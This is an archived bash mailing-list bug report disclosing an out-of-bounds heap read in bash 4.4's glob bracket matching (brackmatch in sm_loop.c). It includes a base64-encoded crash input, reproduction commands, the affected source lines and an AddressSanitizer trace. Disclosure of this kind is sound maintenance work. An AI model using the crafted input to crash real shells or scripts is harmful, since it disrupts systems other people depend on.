out-of-bound read in brackmatch function in "sm

bug-bash

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

out-of-bound read in brackmatch function in "sm_loop.c"

From:	op7ic \x00
Subject:	out-of-bound read in brackmatch function in "sm_loop.c"
Date:	Wed, 2 Nov 2016 12:06:45 +0000

Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS:  -DPROGRAM='bash' -DCONF_HOSTTYPE='x86_64'
-DCONF_OSTYPE='linux-gnu' -DCONF_MACHTYPE='x86_64-unknown-linux-gnu'
-DCONF_VENDOR='unknown' -DLOCALEDIR='/usr/share/locale'
-DPACKAGE='bash' -DSHELL -DHAVE_CONFIG_H   -I.  -I. -I./include
-I./lib  -ggdb3 -O0 -Wno-parenthese$
Machine Type: x86_64-unknown-linux-gnu
Bash Version: 4.4
Patch Level: 0
Release Status: release

Description:

A out-of-bound read was identified in "brackmatch" function in
"sm_loop.c" source file when parsing specially crafted bash source
file. The impact is low and will just result in crashing the
interpreter. To replicate this issue use the attached sample below and
execute the following command:

./bash PoC.sh

PoC.sh base64 encoded:

Wy5bLio=

Repeat-By:
echo Wy5bLio= > PoC.sh.b64
base64 -d PoC.sh.b64 > PoC.sh
valgrind ./bash PoC.sh


Vulnerable Code:

475       /* POSIX.2 2.8.3.1.2 says: `An expression containing a `[' that
476          is not preceded by a backslash and is not part of a bracket
477          expression produces undefined results.'  This implementation
478          treats the `[' as just a character to be matched if there is
479          not a closing `]'. */
480       if (c == L('\0'))
481         return ((test == L('[')) ? savep : (CHAR *)0);
482
483       c = *p++;
484       c = FOLD (c);
485
486       if ((flags & FNM_PATHNAME) && c == L('/'))
487         /* [/] can never match when matching a pathname.  */
488         return (CHAR *)0;





ASAN Report (needs to compile with -fsanitize=address):

bash/bash PoC.sh
=================================================================
==30562==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x60200000d7fb at pc 0x77eb6c bp 0x759126b50b90 sp 0x759126b50b88
READ of size 1 at 0x60200000d7fb thread T0
    #0 0x77eb6b in brackmatch /opt/bash/lib/glob/sm_loop.c:483
    #1 0x77eb6b in gmatch /opt/bash/lib/glob/sm_loop.c:293
    #2 0x78c559 in gmatch /opt/bash/lib/glob/sm_loop.c:40
    #3 0x78c559 in internal_strmatch /opt/bash/lib/glob/sm_loop.c:42
    #4 0x78c559 in xstrmatch /opt/bash/lib/glob/smatch.c:407
    #5 0x7750b3 in glob_vector /opt/bash/lib/glob/glob.c:806
    #6 0x776fd2 in glob_filename /opt/bash/lib/glob/glob.c:1341
    #7 0x63f5a6 in shell_glob_filename /opt/bash/pathexp.c:413
    #8 0x60c7a6 in glob_expand_word_list /opt/bash/subst.c:10261
    #9 0x60c7a6 in expand_word_list_internal /opt/bash/subst.c:10696
    #10 0x4cf780 in execute_simple_command /opt/bash/execute_cmd.c:4153
    #11 0x4d9414 in execute_command_internal /opt/bash/execute_cmd.c:802
    #12 0x4d9414 in execute_command /opt/bash/execute_cmd.c:405
    #13 0x4384d5 in reader_loop /opt/bash/eval.c:180
    #14 0x42e5f0 in main /opt/bash/shell.c:792
    #15 0x68553d959b44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #16 0x4331dc (/opt/bash/bash+0x4331dc)

0x60200000d7fb is located 0 bytes to the right of 11-byte region
[0x60200000d7f0,0x60200000d7fb)
allocated by thread T0 here:
    #0 0x68553e16573f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x6e3a05 in xmalloc /opt/bash/xmalloc.c:112

SUMMARY: AddressSanitizer: heap-buffer-overflow
/opt/bash/lib/glob/sm_loop.c:483 brackmatch
Shadow bytes around the buggy address:
  0x0c047fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9af0: fa fa fa fa fa fa fa fa fa fa fd fa fa fa 00[03]
  0x0c047fff9b00: fa fa 00 00 fa fa 06 fa fa fa 00 00 fa fa 00 00
  0x0c047fff9b10: fa fa fd fa fa fa 00 00 fa fa 06 fa fa fa 00 00
  0x0c047fff9b20: fa fa 00 00 fa fa 06 fa fa fa 00 00 fa fa 07 fa
  0x0c047fff9b30: fa fa fd fa fa fa 07 fa fa fa 05 fa fa fa 05 fa
  0x0c047fff9b40: fa fa 02 fa fa fa fd fa fa fa 07 fa fa fa 07 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==30562==ABORTING

[Prev in Thread]

Current Thread

[Next in Thread]

out-of-bound read in brackmatch function in "sm_loop.c", op7ic \x00 <=
- Re: out-of-bound read in brackmatch function in "sm_loop.c", Chet Ramey, 2016/11/02
  - Re: out-of-bound read in brackmatch function in "sm_loop.c", op7ic \x00, 2016/11/03

Prev by Date: 4.4: crash in redir10 test; use after free?
Next by Date: Re: 4.4: crash in redir10 test; use after free?
Previous by thread: 4.4: crash in redir10 test; use after free?
Next by thread: Re: out-of-bound read in brackmatch function in "sm_loop.c"
Index(es):
- Date
- Thread